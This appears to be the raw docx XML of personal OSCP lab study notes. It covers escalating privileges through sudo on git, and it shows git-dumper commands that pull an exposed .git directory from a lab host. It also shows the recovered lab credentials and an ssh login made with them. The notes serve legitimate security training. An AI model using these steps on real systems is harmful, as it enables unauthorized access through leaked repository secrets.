      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we conclude this section, let's add the username and password to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">creds.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003283">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003284">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's summarize what we've achieved in this section. We used the linPEAS automated enumeration script to identify potentially sensitive information and privilege escalation vectors. The script identified that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be run with sudo as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">daniela</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the WordPress directory is a Git repository, and a cleartext password is used in the WordPress database settings. By abusing the sudo command, we successfully elevated our privileges. Then, we identified a previously removed bash script in the Git repository and displayed it. This script contained a new username and password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003285">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032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287">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kpru9x9lqk6l" w:id="447"/>
      <w:bookmarkEnd w:id="447"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Git-dumper (to recreate repo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003288">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003289">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .144 machine on OSCP-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install git dumper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install -y pipx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx ensurepath</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx install git-dumper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000328F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can know use it since it's added to PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003290">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003291">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to use git-dumper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /new_dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make new directory to hold this git repo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003294">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-dumper http://192.168.236.144/.git /path/to/folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003295">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/folder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with path to file where you want the contents to be dumped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003296">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="746"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I recommend making a new directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003297">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003298">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with the git folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003299">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you download it locally, you can enumerate the git logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look through the log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is like git log and git show combined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows all the logs and also all the changes between each log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then scroll through the output, since it's a lot of output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000329F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OR you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git show &lt;id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where the id is of the most recent commit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both methods of looking at log show the credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stuart : BreakingBad92</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4762500" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99" name="image101.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image101.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1115"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47625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32A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh stuart@192.168.236.144</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1116">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bullybox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we found a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1117">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BitForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we found a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As introduced in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
